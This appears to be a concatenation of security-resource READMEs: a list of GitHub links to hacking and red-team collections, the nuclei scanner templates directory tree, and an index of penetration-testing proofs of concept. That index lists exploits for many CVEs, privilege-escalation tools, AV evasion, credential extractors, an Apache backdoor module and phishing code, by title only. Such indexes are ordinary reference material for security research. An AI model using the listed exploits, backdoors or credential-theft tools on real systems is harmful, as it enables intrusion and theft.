https://github.com/meirwah/awesome-incident-response
https://github.com/carpedm20/awesome-hacking
https://github.com/rshipp/awesome-malware-analysis
https://github.com/thibmaek/awesome-raspberry-pi
https://github.com/vitalysim/Awesome-Hacking-Resources
https://github.com/mre/awesome-static-analysis
https://github.com/coreb1t/awesome-pentest-cheat-sheets
https://github.com/infosecn1nja/Red-Teaming-Toolkit
https://github.com/rmusser01/Infosec_Reference
https://github.com/trimstray/the-book-of-secret-knowledge
https://github.com/N7WEra/SharpAllTheThings
https://github.com/3gstudent/Pentest-and-Development-Tips
https://github.com/qazbnm456/awesome-web-security
https://github.com/chryzsh/awesome-windows-security
https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE
https://github.com/We5ter/Scanners-Box
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/smgorelik/Windows-RCE-exploits
https://github.com/trustedsec/physical-docs
https://github.com/matterpreter/OffensiveCSharp
https://github.com/mgeeky/Penetration-Testing-Tools
https://github.com/nomi-sec/PoC-in-GitHub
https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques
https://github.com/netbiosX/Checklists
https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts
https://github.com/adon90/pentest_compilation
https://github.com/sailay1996/awesome_windows_logical_bugs
https://github.com/EnableSecurity/awesome-rtc-hacking
https://github.com/d1pakda5/PowerShell-for-Pentesters
https://github.com/google/tsunami-security-scanner

About: Useful Pentest tool links

README.md

Templates are the core of the nuclei scanner and power the actual scanning engine. This repository stores and houses various templates for the scanner, provided by our team as well as contributed by the community.
We hope that you also contribute by sending templates via pull requests and grow the list.

Template Directory

├── LICENSE
├── README.md
├── basic-detections
│   ├── basic-xss-prober.yaml
│   └── general-tokens.yaml
├── brute-force
│   └── tomcat-manager-bruteforce.yaml
├── cves
│   ├── CVE-2017-10075.yaml
│   ├── CVE-2017-7529.yaml
│   ├── CVE-2017-9506.yaml
│   ├── CVE-2017-9841.yaml
│   ├── CVE-2018-0296.yaml
│   ├── CVE-2018-1000129.yaml
│   ├── CVE-2018-11409.yaml
│   ├── CVE-2018-11759.yaml
│   ├── CVE-2018-1247.yaml
│   ├── CVE-2018-1271.yaml
│   ├── CVE-2018-13379.yaml
│   ├── CVE-2018-14728.yaml
│   ├── CVE-2018-16341.yaml
│   ├── CVE-2018-18069.yaml
│   ├── CVE-2018-19439.yaml
│   ├── CVE-2018-20824.yaml
│   ├── CVE-2018-2791.yaml
│   ├── CVE-2018-3714.yaml
│   ├── CVE-2018-3760.yaml
│   ├── CVE-2018-5230.yaml
│   ├── CVE-2018-7490.yaml
│   ├── CVE-2019-10475.yaml
│   ├── CVE-2019-11510.yaml
│   ├── CVE-2019-12314.yaml
│   ├── CVE-2019-14322.yaml
│   ├── CVE-2019-14974.yaml
│   ├── CVE-2019-15043.yaml
│   ├── CVE-2019-16759.yaml
│   ├── CVE-2019-17382.yaml
│   ├── CVE-2019-18394.yaml
│   ├── CVE-2019-19368.yaml
│   ├── CVE-2019-19781.yaml
│   ├── CVE-2019-19908.yaml
│   ├── CVE-2019-19985.yaml
│   ├── CVE-2019-2588.yaml
│   ├── CVE-2019-3396.yaml
│   ├── CVE-2019-3799.yaml
│   ├── CVE-2019-5418.yaml
│   ├── CVE-2019-8449.yaml
│   ├── CVE-2019-8451.yaml
│   ├── CVE-2019-8903.yaml
│   ├── CVE-2019-8982.yaml
│   ├── CVE-2020-10199.yaml
│   ├── CVE-2020-10204.yaml
│   ├── CVE-2020-1147.yaml
│   ├── CVE-2020-12720.yaml
│   ├── CVE-2020-13167.yaml
│   ├── CVE-2020-2096.yaml
│   ├── CVE-2020-3187.yaml
│   ├── CVE-2020-3452.yaml
│   ├── CVE-2020-5284.yaml
│   ├── CVE-2020-5405.yaml
│   ├── CVE-2020-5410.yaml
│   ├── CVE-2020-5902.yaml
│   ├── CVE-2020-6287.yaml
│   ├── CVE-2020-7209.yaml
│   ├── CVE-2020-7961.yaml
│   ├── CVE-2020-8091.yaml
│   ├── CVE-2020-8115.yaml
│   ├── CVE-2020-8191.yaml
│   ├── CVE-2020-8193.yaml
│   ├── CVE-2020-8194.yaml
│   ├── CVE-2020-8512.yaml
│   ├── CVE-2020-8982.yaml
│   ├── CVE-2020-9484.yaml
│   └── CVE-2020-9757.yaml
├── dns
│   ├── azure-takeover-detection.yaml
│   ├── cname-service-detector.yaml
│   ├── dead-host-with-cname.yaml
│   └── servfail-refused-hosts.yaml
├── files
│   ├── apc-info.yaml
│   ├── cgi-test-page.yaml
│   ├── debug-pprof.yaml
│   ├── dir-listing.yaml
│   ├── docker-registry.yaml
│   ├── drupal-install.yaml
│   ├── elasticsearch.yaml
│   ├── exposed-kibana.yaml
│   ├── exposed-svn.yaml
│   ├── filezilla.yaml
│   ├── firebase-detect.yaml
│   ├── git-config.yaml
│   ├── htaccess-config.yaml
│   ├── jkstatus-manager.yaml
│   ├── jolokia.yaml
│   ├── laravel-env.yaml
│   ├── lazy-file.yaml
│   ├── phpinfo.yaml
│   ├── public-tomcat-instance.yaml
│   ├── security.txt.yaml
│   ├── server-status-localhost.yaml
│   ├── telerik-dialoghandler-detect.yaml
│   ├── telerik-fileupload-detect.yaml
│   ├── tomcat-scripts.yaml
│   ├── wadl-files.yaml
│   ├── web-config.yaml
│   ├── wordpress-directory-listing.yaml
│   ├── wordpress-user-enumeration.yaml
│   ├── wp-xmlrpc.yaml
│   └── zip-backup-files.yaml
├── panels
│   ├── atlassian-crowd-panel.yaml
│   ├── cisco-asa-panel.yaml
│   ├── citrix-adc-gateway-detect.yaml
│   ├── compal.yaml
│   ├── crxde.yaml
│   ├── docker-api.yaml
│   ├── fortinet-fortigate-panel.yaml
│   ├── globalprotect-panel.yaml
│   ├── grafana-detect.yaml
│   ├── jenkins-asyncpeople.yaml
│   ├── jmx-console.yaml
│   ├── kubernetes-pods.yaml
│   ├── mongo-express-web-gui.yaml
│   ├── parallels-html-client.yaml
│   ├── phpmyadmin-panel.yaml
│   ├── pulse-secure-panel.yaml
│   ├── rabbitmq-dashboard.yaml
│   ├── sap-netweaver-detect.yaml
│   ├── sap-recon-detect.yaml
│   ├── sophos-fw-version-detect.yaml
│   ├── supervpn-panel.yaml
│   ├── swagger-panel.yaml
│   ├── tikiwiki-cms.yaml
│   ├── weave-scope-dashboard-detect.yaml
│   └── webeditors.yaml
├── payloads
│   └── CVE-2020-6287.xml
├── security-misconfiguration
│   ├── basic-cors-flash.yaml
│   ├── basic-cors.yaml
│   ├── front-page-misconfig.yaml
│   ├── jira-service-desk-signup.yaml
│   ├── jira-unauthenticated-dashboards.yaml
│   ├── jira-unauthenticated-popular-filters.yaml
│   ├── jira-unauthenticated-projects.yaml
│   ├── jira-unauthenticated-user-picker.yaml
│   ├── rabbitmq-default-admin.yaml
│   ├── rack-mini-profiler.yaml
│   ├── springboot-detect.yaml
│   └── wamp-xdebug-detect.yaml
├── subdomain-takeover
│   ├── detect-all-takeovers.yaml
│   └── s3-subtakeover.yaml
├── technologies
│   ├── bigip-config-utility-detect.yaml
│   ├── citrix-vpn-detect.yaml
│   ├── clockwork-php-page.yaml
│   ├── couchdb-detect.yaml
│   ├── github-enterprise-detect.yaml
│   ├── gitlab-detect.yaml
│   ├── graphql.yaml
│   ├── home-assistant.yaml
│   ├── jaspersoft-detect.yaml
│   ├── jira-detect.yaml
│   ├── liferay-portal-detect.yaml
│   ├── linkerd-badrule-detect.yaml
│   ├── linkerd-ssrf-detect.yaml
│   ├── netsweeper-webadmin-detect.yaml
│   ├── ntlm-directories.yaml
│   ├── prometheus-exposed-panel.yaml
│   ├── s3-detect.yaml
│   ├── sap-netweaver-as-java-detect.yaml
│   ├── sap-netweaver-detect.yaml
│   ├── sql-server-reporting.yaml
│   ├── tech-detect.yaml
│   ├── weblogic-detect.yaml
│   └── werkzeug-debugger-detect.yaml
├── tokens
│   ├── amazon-mws-auth-token-value.yaml
│   ├── aws-access-key-value.yaml
│   ├── google-api-key.yaml
│   ├── http-username-password.yaml
│   ├── mailchimp-api-key.yaml
│   └── slack-access-token.yaml
├── vulnerabilities
│   ├── cached-aem-pages.yaml
│   ├── couchdb-adminparty.yaml
│   ├── crlf-injection.yaml
│   ├── discourse-xss.yaml
│   ├── git-config-nginxoffbyslash.yaml
│   ├── ibm-infoprint-directory-traversal.yaml
│   ├── microstrategy-ssrf.yaml
│   ├── moodle-filter-jmol-lfi.yaml
│   ├── moodle-filter-jmol-xss.yaml
│   ├── nginx-module-vts-xss.yaml
│   ├── open-redirect.yaml
│   ├── oracle-ebs-bispgraph-file-access.yaml
│   ├── pdf-signer-ssti-to-rce.yaml
│   ├── rce-shellshock-user-agent.yaml
│   ├── rce-via-java-deserialization.yaml
│   ├── springboot-actuators-jolokia-xxe.yaml
│   ├── symfony-debugmode.yaml
│   ├── tikiwiki-reflected-xss.yaml
│   ├── tomcat-manager-pathnormalization.yaml
│   ├── twig-php-ssti.yaml
│   ├── wordpress-duplicator-path-traversal.yaml
│   ├── wordpress-wordfence-xss.yaml
│   └── x-forwarded-host-injection.yaml
└── workflows
    ├── bigip-pwner-workflow.yaml
    ├── jira-exploitaiton-workflow.yaml
    ├── liferay-rce-workflow.yaml
    ├── netsweeper-preauth-rce-workflow.yaml
    ├── rabbitmq-workflow.yaml
    ├── sap-netweaver-workflow.yaml
    └── springboot-pwner-workflow.yaml

13 directories, 204 templates.

Please navigate to https://nuclei.projectdiscovery.io for detailed documentation on building your own custom templates, along with many example templates for easy understanding.

Notes:
Use a YAML linter (e.g. yamllint) to validate new templates when sending pull requests.
Use a YAML formatter (e.g. jsonformatter) to format new templates when sending pull requests.

Thanks again for your contribution and for keeping the community vibrant.

About: Community curated list of template files for the nuclei engine to find security vulnerabilities and fingerprint targets. github.com/projectdiscovery/nuclei
Topics: nuclei-templates, nuclei, bugbounty, security, content-bruteforcing
License: MIT License
Latest release: v4.0.2 (43 releases)

README.md

Penetration_Testing_POC

A collection of POCs, scripts, tools, articles and other techniques used in penetration testing, kept as notes; additions are welcome.

Contents:
Please use search [Ctrl+F] to find things
IOT Device & Mobile Phone
Web APP
Privilege escalation helpers
PC
tools - small tool collection
Articles / books / tutorials
Notes

Please use search [Ctrl+F] to find things

IOT Device & Mobile Phone

Tianyi Skyworth awifi router: multiple unauthorized access vulnerabilities
Huawei WS331a product management page CSRF vulnerability
CVE-2019-16313 Fengwang Hulian (蜂网互联) enterprise router v4.31 password disclosure vulnerability
D-Link router RCE vulnerability
CVE-2019-13051 - Pi-Hole (router-side ad blocker) command injection & privilege escalation
D-Link DIR-859 - RCE UnAutenticated (CVE-2019-17621)
Huawei HG255 Directory Traversal | local backup file
D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit) CVE-2019-20215
From Interfaces.d to RCE: hunting vulnerabilities in the Mozilla WebThings IoT gateway
Xiaomi router series remote command execution vulnerabilities (CVE-2019-18370, CVE-2019-18371)
Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload: firmware can be replaced without authentication)
CVE-2020-8634 & CVE-2020-8635 | Wing FTP Server 6.2.3 privilege escalation: discovery, analysis and reproduction | Wing FTP Server 6.2.5 privilege escalation
CVE-2020-9374 - TP LINK TL-WR849N - RCE
CVE-2020-12753 - LG smartphone arbitrary code execution vulnerability
CVE-2020-12695 - UPnP security vulnerability
79 Netgear router models exposed to remote takeover 0day

Web APP

Zhiyuan (致远) OA A8 getshell 0day
Couch through 2.0 path disclosure vulnerability
Cobub Razor 0.7.2 cross-site request forgery vulnerability
joyplus-cms 1.6.0 CSRF vulnerability allows adding an administrator account
MiniCMS 1.10 CSRF vulnerability allows adding an administrator account
Z-Blog 1.5.1.1740 XSS vulnerability
YzmCMS 3.6 XSS vulnerability
Cobub Razor 0.7.2 unauthorized addition of administrator accounts
Cobub Razor 0.8.0 SQL injection vulnerability
Cobub Razor 0.8.0 physical path disclosure vulnerability
Wuzhi (五指) CMS 4.1.0 CSRF vulnerability allows adding an administrator account
DomainMod XSS collection
GreenCMS v2.3.0603 CSRF vulnerability allows obtaining a webshell & adding an administrator account
yii2-statemachine v2.x.x XSS vulnerability
maccms_v10 CSRF vulnerability allows adding arbitrary accounts
LFCMS 3.7.0 CSRF vulnerability allows adding arbitrary user or administrator accounts
Finecms_v5.4 CSRF vulnerability allows changing the administrator password
Amazon Kindle Fire HD (3rd Generation) kernel driver denial of service vulnerability
Metinfo 6.1.2 XSS & SQL injection vulnerabilities
Hucart cms v5.7.4 CSRF vulnerability allows adding arbitrary administrator accounts
indexhibit cms v2.1.5 getshell by directly editing PHP files
S-CMS enterprise site builder PHP v3.0 backend CSRF allows adding administrator-privileged accounts
S-CMS PHP v3.0 SQL injection vulnerability
MetInfoCMS 5.X GETSHELL vulnerability collection
discuz ml RCE vulnerability detection tool
thinkphp5 framework flaw leading to remote code execution
FineCMS_v5.0.8 two getshell issues
Struts2-045 batch vulnerability detection | search-engine harvesting and scanning
thinkphp5 command execution
typecho deserialization vulnerability
CVE-2019-10173 Xstream 1.4.10 remote code execution
IIS/CVE-2017-7269-Echo-PoC
CVE-2019-15107 Webmin RCE
thinkphp5 RCE vulnerability detection tool
thinkphp5 RCE collection
thinkphp3.X-thinkphp5.x: collected analyses of historical ThinkPHP framework vulnerabilities
CVE-2019-11510
Redis (<=5.0.5) RCE
Redis 4.x/5.x RCE (RCE via master-slave replication)
Generating a malicious Redis module .so file combined with master-slave replication RCE to achieve command execution | related article
RedisWriteFile - writes files losslessly via Redis master-slave replication; can write intact EXE, DLL and LNK files on Windows and OS binaries on Linux
WeblogicScanLot series, Weblogic batch vulnerability detection tool
jboss_CVE-2017-12149
WordPress denial of service (DoS) - CVE-2018-6389
Webmin Remote Code Execution (authenticated) - CVE-2019-15642
CVE-2019-16131 OKLite v1.2.25 arbitrary file upload vulnerability
CVE-2019-16132 OKLite v1.2.25 arbitrary file deletion vulnerability
CVE-2019-16309 FlameCMS 3.3.5 SQL injection in the backend login
CVE-2019-16314 indexhibit cms v2.1.5 reinstallation leading to getshell
Weaver (泛微) OA management system RCE exploit script
CVE-2019-16759 vBulletin 5.x 0day pre-auth RCE exploit
zentao-getshell: ZenTao 8.2 - 9.2.1 front-end getshell
Weaver e-cology OA front-end SQL injection vulnerability
Joomla-3.4.6-RCE
Easy File Sharing Web Server 7.2 - GET buffer overflow (SEH)
Building an ASMX to bypass a restrictive WAF and achieve command execution (for ASP.NET environments)
CVE-2019-17662 - ThinVNC 1.0b1 - Authentication Bypass
CVE-2019-16278andCVE-2019-16279-about-nostromo-nhttpd
CVE-2019-11043 - PHP remote code execution vulnerability
ThinkCMF vulnerability collection
CVE-2019-7609 - Kibana below 6.6.0 unauthenticated remote code/command execution
ecologyExp.jar - Weaver ecology OA database configuration file read
freeFTP 1.0.8 - 'PASS' remote buffer overflow
rConfig v3.9.2 RCE vulnerability
apache_solr_rce
CVE-2019-7580 thinkcmf-5.0.190111 code execution via arbitrary file write in the backend
Apache Flink arbitrary JAR upload leading to remote code execution
Tool for testing the security of JSON API tokens
cve-2019-17424 nipper-ng 0.11.10 Remote Buffer Overflow, with PoC
CVE-2019-12409_Apache_Solr RCE
Shiro RCE (Padding Oracle Attack)
CVE-2019-19634 - class.upload.php <= 2.0.4 arbitrary file upload
Apache Solr RCE via Velocity Template Injection
CVE-2019-10758 - mongo-express before 0.54.0 is vulnerable to Remote Code Execution
CVE-2019-2107 - Android video playback RCE POC (Android 7.0, 7.1.1, 7.1.2, 8.0, 8.1, 9.0)
CVE-2019-19844 - Django password reset vulnerability (affected versions: Django master branch, Django 3.0, Django 2.2, Django 1.11)
CVE-2019-17556-unsafe-deserialization-in-apache-olingo (Apache Olingo deserialization vulnerability, affects 4.0.0 through 4.6.0)
ZZCMS201910 SQL Injections
WDJACMS 1.5.2 template injection vulnerability
CVE-2019-19781 - Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway
CVE-2019-19781.nse - use Nmap to check for Citrix ADC Remote Code Execution
MySQL client arbitrary file read attack chain extension
CVE-2020-5504 - phpMyAdmin injection (requires login)
CVE-2020-5509 - remote code execution vulnerability in Car Rental Project 1.0
CryptoAPI PoC CVE-2020-0601 | another PoC for CVE-2020-0601
New Weblogic RCE (CVE-2020-2546, CVE-2020-2551)
CVE-2020-2546 | WebLogic WLS core component RCE analysis (CVE-2020-2551) | CVE-2020-2551 - Weblogic IIOP deserialization EXP
CVE-2020-5398 - RFD (Reflected File Download) Attack for Spring MVC
PHPOK v5.3 & v5.4 getshell | phpok V5.4.137 front-end getshell analysis | PHPOK 4.7 from injection to getshell
thinkphp6 session arbitrary file creation vulnerability reproduction, with POC (original published on a vulnerability-alert WeChat public account)
ThinkPHP 6.x deserialization POP chain (part 1) | original link
ThinkPHP 6.x deserialization POP chain (part 2) | original link
ThinkPHP 6.x deserialization POP chain (part 3) | original link
WordPress InfiniteWP - Client Authentication Bypass (Metasploit)
[Linux privesc/RCE] OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution
CVE-2020-7471 - django1.11-1.11.282.2-2.2.103.0-3.0.3 StringAgg(delimiter) SQL injection from unsafe data: vulnerable environment and POC
CVE-2019-17564 : Apache Dubbo deserialization vulnerability
CVE-2019-2725 (CNVD-C-2019-48814, WebLogic wls9-async)
YzmCMS 5.4 backend getshell
About Ghostcat (CVE-2020-1938): CNVD-2020-10487 (CVE-2020-1938), Tomcat AJP file read vulnerability POC | Java version POC | Tomcat AJP protocol file read vulnerability | another Python CVE-2020-1938 vulnerability check | CVE-2020-1938 reproduction environment and EXP
CVE-2020-8840: Jackson-databind remote command execution vulnerability (may also affect fastjson)
CVE-2020-8813 - Cacti v1.2.8 RCE EXP and analysis (requires authentication, or no login needed if guest access is enabled) (Cacti is a Linux network traffic monitoring and graphing tool built on PHP, MySQL, SNMP and RRDTool) | EXP | CVE-2020-8813 MSF exploit script
CVE-2020-7246 - PHP project management system qdPM < 9.1 RCE
CVE-2020-9547: FasterXML/jackson-databind remote code execution vulnerability
CVE-2020-9548: FasterXML/jackson-databind remote code execution vulnerability
Apache ActiveMQ 5.11.1 directory traversal / shell upload
CVE-2020-2555: WebLogic RCE vulnerability POC | CVE-2020-2555 - Weblogic com.tangosol.util.extractor.ReflectionExtractor RCE
CVE-2020-1947 - Apache ShardingSphere UI YAML parsing remote code execution vulnerability
CVE-2020-0554: phpMyAdmin backend SQL injection
Weaver E-Mobile OGNL expression injection | 表达式注入.pdf
Tongda (通达) OA RCE vulnerability
CVE-2020-10673 - jackson-databind JNDI injection leading to remote code execution
CVE-2020-10199, CVE-2020-10204 one-click vulnerability check tool with GUI (Sonatype Nexus < 3.21.1)
CVE-2020-2555 - Oracle Coherence deserialization vulnerability | analysis article
cve-2020-5260 - Git credential leak vulnerability
Tongda OA front-end arbitrary user login forgery vulnerability batch check
CVE-2020-11890 Joomla RCE < 3.9.17 remote command execution vulnerability (requires valid credentials)
CVE-2020-10238 [Joomla RCE <= 3.9.15 remote command execution vulnerability (requires valid credentials)] & CVE-2020-10239 [Joomla RCE 3.7.0 to 3.9.15 remote command execution vulnerability (requires valid credentials)]
CVE-2020-2546, CVE-2020-2915, CVE-2020-2801, CVE-2020-2798, CVE-2020-2883, CVE-2020-2884, CVE-2020-2950 WebLogic T3 payload exploit poc python3 | CVE-2020-2883 - Weblogic coherence.jar RCE
tongda_oa_rce - Tongda OA unauthorized login + file upload getshell
CVE-2020-11651 - SaltStack Proof of Concept [authentication bypass RCE vulnerability] | CVE-2020-11651 && CVE-2020-11652 EXP
showdoc api_page arbitrary file upload getshell
Fastjson <= 1.2.47 remote command execution exploit tool and method
SpringBoot_Actuator_RCE
jizhicms (极致CMS) v1.7.1 code audit - arbitrary file upload getshell + SQL injection + reflected XSS
CVE-2020-9484: Apache Tomcat session deserialization code execution vulnerability | CVE-2020-9484: analysis and exploitation of the Apache Tomcat deserialization RCE
PHPOK latest version vulnerability chain GETSHELL
Apache Kylin 3.0.1 command injection vulnerability
weblogic T3 collections java InvokerTransformer Transformer InvokerTransformer weblogic.jndi.WLInitialContextFactory
CVE-2020-5410 Spring Cloud Config directory traversal vulnerability
NewZhan CMS all versions SQL injection (0day)
Blind or UNION? Notes on an odd injection point in SEMCMS 3.9 (0day)
From auditing PbootCMS (2.0.3 & 2.0.7 front-end RCE + 2.0.8 backend RCE) to bypassing a certain "Dog" WAF
CVE-2020-1948 : Apache Dubbo remote code execution vulnerability
CVE-2020-5902 - F5 BIG-IP remote code execution (RCE) & arbitrary file inclusion/read

Privilege escalation helpers

windows-kernel-exploits: collection of Windows privilege escalation vulnerabilities
Notes on Windows overflow privilege escalation / local copy saved + Linux & Windows privesc mind map
Mind map of common Windows persistence techniques
CVE-2019-0803 Win32k privilege escalation tool
Dirty COW Linux privilege escalation vulnerability
RAT AV evasion from beginner to practice: whitelist (113 entries) | summary PDF
Linux privesc - CVE-2019-13272 A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME
Linux privilege escalation one-click helper check tool
Injecting PowerShell scripts directly into a process to bypass restrictions on powershell.exe
CVE-2020-2696 - Local privilege escalation via CDE dtsession
CVE-2020-0683 - privilege escalation via the Windows MSI "Installer service"
Linux sudo privesc helper tool: finds sudo permission misconfigurations
Windows privesc - CVE-2020-0668: Windows Service Tracing local privilege escalation vulnerability
Linux privesc - Linux kernel XFRM UAF poc (3.x - 5.x kernels), testable on systems not patched before January 2020
linux-kernel-exploits: collection of Linux privilege escalation vulnerabilities
Linux privesc helper check Perl script | Linux privesc helper check bash script
CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost | [Windows privesc] Windows SMBv3 LPE exploit, compiled .exe | SMBGhost_RCE_PoC - remote code execution EXP | Windows_SMBv3_RCE_CVE-2020-0796 reproduction
getAV - single-file Windows AV process comparison tool
[Windows privesc tool] Windows 7 to Windows 10 / Server 2019 | modified version for use with CS that spawns a SYSTEM-privileged session
[Windows privesc tool] SweetPotato modified version for running commands from a webshell | locally compiled build | click to download or right-click save as | SweetPotato webshell command execution version PDF
[bypass UAC] Windows 8.1 and 10 UAC bypass abusing WinSxS in "dccw.exe"
[Windows privesc] CVE-2018-8120 Exploit for Win2003 Win2008 WinXP Win7
[Windows privesc, Windows 10 & Server 2019] PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019 | companion article: pipePotato reproduction | Windows privilege escalation BadPotato - tested successfully on fully patched Windows 2012-2019 and 8-10
[Windows privesc] Large collection of Windows privilege escalation techniques
[Windows privesc] CVE-2020-1048 | PrintDemon local privilege escalation - affects all Windows versions released since 1996 (Windows NT 4)
[Windows bypass UAC] UACME - integrates more than 60 UAC bypass methods
CVE-2020-1088: analysis of the Windows wersvc.dll arbitrary file deletion local privilege escalation vulnerability
[Windows privesc] CVE-2019-0863 - privilege escalation via the Windows Error Reporting mechanism - EXP
[Windows privesc] CVE-2020-1066-EXP
[Windows privesc] CVE-2020-0787-EXP-ALL-WINDOWS-VERSION - privesc EXP for all Windows versions
[Windows privesc] CVE-2020-1054 - Win32k privilege escalation Poc
[Linux privesc] A brief summary of Linux privilege escalation
[Windows privesc] wesng - Windows privesc helper script

PC

Microsoft RDP remote code execution vulnerability (CVE-2019-0708)
CVE-2019-0708 - Python version
MS17-010 - Microsoft EternalBlue vulnerability
macOS-Kernel-Exploit
CVE-2019-1388 UAC privilege escalation (nt authority\system)
CVE-2019-1405 and CVE-2019-1322: privilege escalation by chaining vulnerabilities
Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation
CVE-2019-11708
Telegram (macOS v4.9.155353) code execution vulnerability
Remote Desktop Gateway RCE bugs CVE-2020-0609 & CVE-2020-0610
Microsoft SharePoint - Deserialization Remote Code Execution
CVE-2020-0728 - Windows Modules Installer Service information disclosure vulnerability
CVE-2020-0618: Microsoft SQL Server Reporting Services remote code execution (RCE) vulnerability | GitHub verification POC (the analysis article above also has one)
CVE-2020-0767 Microsoft ChakraCore scripting engine [the open-source core of the Chakra JavaScript engine in the Edge browser] security vulnerability
CVE-2020-0688: Microsoft Exchange remote code execution vulnerability | CVE-2020-0688_EXP - another detection/exploit script | yet another cve-2020-0688 exploit script | Exploit and detect tools for CVE-2020-0688
CVE-2020-0674: Internet Explorer remote code execution vulnerability check
CVE-2020-8794: OpenSMTPD remote command execution vulnerability
Linux - CVE-2020-8597: PPPD remote code execution vulnerability
Windows - CVE-2020-0796: suspected "wormable" Microsoft SMBv3 protocol vulnerability | related discussion | CVE-2020-0796 detection and remediation | another CVE-2020-0796 detection tool (can crash and reboot the target system)
SMBGhost_RCE_PoC (CVE-2020-0796)
WinRAR code execution vulnerability (CVE-2018-20250) - POC | related article | Internet-wide screening for the WinRAR code execution vulnerability (CVE-2018-20250)
Windows 10 related vulnerability EXPs & POCs
Shiro RCE deserialization command execution one-click tool
CVE-2019-1458 - Win32k elevation of privilege vulnerability [usable from a shell - Windows privesc]
CVE-2019-1253 - Windows privilege escalation - another PoC for the AppXSvc arbitrary file security descriptor overwrite EoP | CVE-2019-1253
BypassAV [AV evasion] Cobalt Strike plugin for quickly generating AV-evading executables
CVE-2020-0674: Internet Explorer UAF vulnerability exp [tested with IE 8, 9, 10 and 11 on 64-bit Win7]
SMBGhost_AutomateExploitation - SMBGhost (CVE-2020-0796) Automate Exploitation and Detection
MS Windows OLE remote code execution vulnerability (CVE-2020-1281)

tools - small tool collection

Small tool to automatically read source code via arbitrary file download in Java environments
Linux login log clearing/forging
Python 2 SOCKS proxy
dede_burp_admin_path - DedeCMS backend path brute force (Windows environment)
PHP 7.1-7.3 disable_functions bypass
A shell that breaks out of disable_functions by various methods to achieve command execution
[PHP] bypass disable_functions via LD_PRELOAD (no need for /usr/sbin/sendmail)
Another PHP disable_functions bypass
Querying the 3389 remote desktop port from cmd
Phishing code disguised as a WeChat Work business card
vbulletin5-rce exploit tool (batch detection/getshell) / a copy of the source saved: vbulletin5-rce.py
CVE-2017-12615
Finding real IP addresses via Shodan and favicon icons
Cobalt Strike extension plugins
Space substitution in the Windows cmd command line
Summary of disable_function bypasses
WAF bypass command injection summary
Retrieving hidden Wi-Fi SSIDs · theKingOfNight's Blog
crt.sh certificate/domain collection
TP (ThinkPHP) vulnerability collection exploit tool, py3 version - from Qi An Xin's Lucifer1993
Struts2 all-version detection and exploit tool written in Python 2 - from Qi An Xin's Lucifer1993
sqlmap tamper to bypass D-Shield (D盾)
sqlmap tamper to bypass Safedog (安全狗)
sqlmap tamper replacing spaces with newlines (filter of a certain enterprise site-builder)
sqlmap tamper to bypass Yunsuo (云锁)
masscan + nmap scanning script
PHP decryption extension
Linux information gathering / incident response / common backdoor detection script
RdpThief - helper for extracting cleartext credentials from the Remote Desktop client
Reverse shell by directly running commands with PowerShell or CMD
FTP/SSH/SNMP/MSSQL/MYSQL/PostGreSQL/REDIS/ElasticSearch/MONGODB weak password check
GitHack - .git leak exploitation script
GitHacker - an easier-to-use git leak exploitation script than GitHack
SVN source leak: dump source from all versions
Multi-process batch website backup file scanning
Empire | related article: a detailed guide to the post-exploitation tool Empire
FOFA Pro view is a FOFA Pro asset display browser extension, currently compatible with Chrome, Firefox and Opera
Zoomeye Tools - uses Zoomeye to get various information about the current page's IP address (requires login)
360 0Kee-Team's crawlergo dynamic crawler combined with the passive scanning feature of Chaitin's XRAY scanner
Internal-network tool Xerosploit - for entertainment (port scanning | DoS | HTML code injection | JavaScript code injection | download interception and replacement | sniffing | DNS spoofing | image replacement | web page defacement | Driftnet)
XXE vulnerability demos in PHP, Java, Python, C# and other languages
Common internal-network penetration toolkit
Loading SHELLCODE from memory to bypass AV | Twitter example
Traffic forwarding tool - pingtunnel disguises tcp/udp/socks5 traffic as ICMP for forwarding
Internal network pentest - creating a Windows user (when common commands such as net and net1 are filtered, a single file adds an administrator directly [the shell needs administrator privileges]) | adduser usage
pypykatz - full Mimikatz functionality implemented in Python 3 (3.6+)
[Windows] Bypassing AV via in-memory PE execution - bypass AV by loading a multiply-XORed payload in memory | author's self-hosted GitLab
wafw00f - quickly identifies whether and which WAF a web application uses (useful before scanning)
Tool to extract other users' passwords on Linux (requires root)
apache2_BackdoorMod - Apache backdoor module
Parses saved passwords of some programs on Windows systems, including Navicat, TeamViewer, FileZilla, WinSCP and the Xmanager family (Xshell, Xftp)
A simple JBoss vulnerability probing tool
An lcx implementation in Go - suitable for proxying internal traffic to the public Internet, e.g. from an Alibaba Cloud machine to your public machine
Cobalt Strike Aggressor plugin pack
Erebus - Cobalt Strike post-exploitation plugin including common scripts for information gathering, privilege acquisition, credential harvesting, trace cleanup, etc.
IP / IP-range asset scanning -> scan open ports, identify running services and deployed websites -> automatically organise scan results -> output visual report + organised results
A script to scan for unsecured Laravel .env files
Struts2 vulnerability scanner, Go version [features: single file, all platforms, usable from a webshell]
Shiro <= 1.2.4 deserialization one-click check tool | Apache Shiro <= 1.2.4 rememberMe deserialization exploit tool
Complete WebLogic vulnerability scanner, fixed version
GitHub sensitive information leak monitoring
Demos of Java security vulnerabilities and techniques
Online scanning - basic website info | neighbouring sites | port scanning | information leaks
bayonet is an SRC asset management system integrating subdomains, port services, vulnerabilities, crawling, etc.
Common C# programs for internal network pentesting bundled as CS scripts, loaded directly in memory
[Vulnerability library] another collection/authoring of various vulnerability POCs and EXPs
reGeorg, the internal-network proxy forwarding tool | related articles: configuring reGeorg + Proxifier for internal pentesting | internal SOCKS5 proxy with reGeorg + Proxifier | reGeorg + Proxifier for internal pentesting | using reGeorg + Proxifier
Neo-reGeorg, a refactored reGeorg
get_Team_Pass - retrieves the TeamViewer ID and password on a target machine (you need valid credentials for the target and port 445 must be reachable)
